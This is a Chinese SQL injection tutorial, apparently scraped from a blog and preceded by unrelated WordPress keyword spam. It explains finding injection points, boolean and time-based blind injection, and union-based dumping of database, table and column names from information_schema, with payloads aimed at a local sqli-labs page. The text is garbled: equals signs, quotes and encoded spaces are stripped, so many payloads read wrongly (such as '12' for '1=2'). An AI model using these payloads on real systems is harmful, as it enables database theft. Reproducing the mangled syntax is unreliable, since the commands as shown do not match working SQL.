wordpress设置多域名多站点,wordpress 添加产品,wordpress选择php,智慧团建注册pc端一、SQL注入的本质
解释#xff1a;想要进行sql注入#xff0c;肯定要发现注入点#xff0c;一般简单的sql注入通过下面两种方式判断就能发现是否存在sql注入漏洞
1.字符型
注意#xff1a;字符型注入可能为或 查询语句#xff1a;
select * from student where…一、SQL注入的本质
解释想要进行sql注入肯定要发现注入点一般简单的sql注入通过下面两种方式判断就能发现是否存在sql注入漏洞
1.字符型
注意字符型注入可能为或 查询语句
select * from student where id5;字符型注入
select * from student where id and 12 -- ;分析上面内容用户输入为 and 12 -- 在此语句下and表示并列左右语句都要满足因为12导致and一定返回false所以这条语句肯定不能回显出其正确答案以此可以判断出是否存在字符型注入 (但这种注入仅限存在回显的情况下不存在的情况肯定要另加讨论)
注意字符型注入一般格式如 and 12 -- 但是注意在网页当中提交请求中 and 12 -- 最后的空格输上会被自动删除所以要用 and 12 --(在url解码后就是表示空格)
特殊情况
SELECT * FROM course WHERE Cno((((4))));
-- 这种情况简单的字符或者数字注入可能会有一些问题2.数字型
查询语句
select * from student where id5;数字注入
select * from student where id1 and 12;分析上面内容用户输入为1 and 12在此语句下and表示并列左右语句都要满足因为12导致and一定返回false所以这条语句肯定不能回显出其正确答案以此可以判断出是否存在数字型注入 (但这种注入仅限存在回显的情况下不存在的情况肯定要另加讨论)
二、SQL注入测试方法
1.布尔盲注
解释布尔盲注适用于界面有明显的反应即数据为显示与不显示两种状态(但是显示与不显示可能并不明显或者说很隐蔽)其实上面介绍字符型注入和数字型注入的时候就用到了
简单例子-查询语句
select * from student where id5;简单例子-字符型注入
select * from student where id and 12 -- ;解释其就是通过and后面的语句来构造但是要保证and前面的一定要为true否则后面的内容验证也就失去了意义注入时也要根据具体情况来构造比如验证账号密码就不能使用 and 12 --(因为你可能不知道账号是什么就是and前面的内容很可能是错的但是登录需要账号密码都正确这时用 or 11 --或许能够有效解决问题)
简单例子-应用实例
//判断是否是 Mysql数据库
http://127.0.0.1/sqli/Less-5/?id1 and exists(select*from information_schema.tables) --
//判断是否是 access数据库
http://127.0.0.1/sqli/Less-5/?id1 and exists(select*from msysobjects) --
//判断是否是 Sqlserver数据库
http://127.0.0.1/sqli/Less-5/?id1 and exists(select*from sysobjects) --2.时间盲注
解释时间盲注的意思在布尔盲注失效即页面无论怎么样注入都不存在回显的情况下可能就需要用到时间盲注了其原理就是如果存在注入点就执行睡眠函数让页面去进行等待以次去观察页面反应时间如果页面大概等待了指定时间才返回值可能就存在时间盲注
查询语句
select * from student where id5;字符型注入
select * from student where id and sleep(5) -- ;解释上诉问题就是在页面没有内容回显的情况下进行的当存在该注入点的时候页面会睡眠5秒以上才会响应这就是证明存在该注入点可能通过类似此的方法来便利获取服务器的数据
三、SQL暴库方法
前提此时已经找到了注入点正在准备执行任意sql命令
1.联合注入
1.1 获取列数
解释只有我们知道当前的列数后面才能让我们执行联合查询语句
sqlSELECT * FROM course WHERE Cno1 ORDER BY 5 -- ;
快速利用
1 ORDER BY 5 --1 ORDER BY 5 -- 知识点如上使用order by语句当order by n中n小于当前表的列数不会报错大于当前表的列数就会报错显示在程序页面可能显示为数据消失或者异常
解释通过发现注入点想要执行我们的sql语句就要用到联合注入
简单执行SELECT * FROM course WHERE Cno-1 UNION SELECT 1,2,3,4 -- ;
常用函数
名称功能database()当前数据库名字user()当前用户的名字version_compile_os操作系统版本datadir数据库的路径version()mysql的版本号
简单例子SELECT * FROM course WHERE Cno-1 UNION SELECT datadir,USER(),DATABASE(),version_compile_os -- ;
1.2 获取数据
1. 查询数据库有哪些库
解释当知道了有哪些数据库才能开始从该数据库获取信息构造后语句SELECT * FROM course
WHERE Cno-1
UNION SELECT 1,2,3,GROUP_CONCAT(schema_name)
FROM information_schema.schemata -- ;GROUP_CONCAT(schema_name) 其相当于把内容显示在一行里面因为在select里面只有1,2,3,4个位置如果很多数据无法按普通命令展示普通命令SELECT schema_name FROM information_schema.schemata;原理information_schema的schemata表里面放着所有数据库信息快速利用 -1 UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) FROM information_schema.schemata ---1 UNION SELECT 1,2,3,GROUP_CONCAT(schema_name) FROM information_schema.schemata --
2. 查询数据库有哪些表
解释当知道了有哪些表才能开始从该表获取信息构造后语句SELECT * FROM course WHERE Cno-1
UNION SELECT 1,2,3,GROUP_CONCAT(table_name)
FROM information_schema.tables
WHERE table_schemaDATABASE() -- ;GROUP_CONCAT(table_name) 其相当于把内容显示在一行里面因为在select里面只有1,2,3,4个位置如果很多数据无法按普通命令展示普通命令SELECT table_name FROM information_schema.tables WHERE table_schemaDATABASE();原理information_schema的tables表里面放着所有数据的表单快速利用 1 UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemaDATABASE() --1 UNION SELECT 1,2,3,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schemaDATABASE() --
3. 查询表里面的字段
解释当知道了表里面有哪些字段才能开始从该表获取信息当然有人可能说知道表名直接使用select *但是由于使用union的联合查询受到诸多限制这样使用并不现实构造后语句SELECT * FROM course WHERE Cno-1
UNION SELECT 1,2,3,GROUP_CONCAT(column_name)
FROM information_schema.columns
WHERE table_namecourse -- ;GROUP_CONCAT(column_name) 其相当于把内容显示在一行里面因为在select里面只有1,2,3,4个位置如果很多数据无法按普通命令展示普通命令SELECT column_name FROM information_schema.columns WHERE table_namecourse;原理information_schema的columns 表里面放着所有数据的表单快速利用 -1 UNION SELECT 1,2,3,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_namecourse ---1 UNION SELECT 1,2,3,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_namecourse --
4. 查询表里面的数据
构造命令
SELECT * FROM course WHERE Cno-1
UNION SELECT 1,2,3,GROUP_CONCAT(Cname) FROM course -- ;普通命令
SELECT Cname FROM course;2.布尔注入
解释上面的例子里面已经介绍了布尔盲注的测试方法同时还介绍了联合注入但是可能存在一种情况对方WAF过滤了union字段那么我们根本就无法使用联合注入那我们只能使用下面介绍的布尔注入
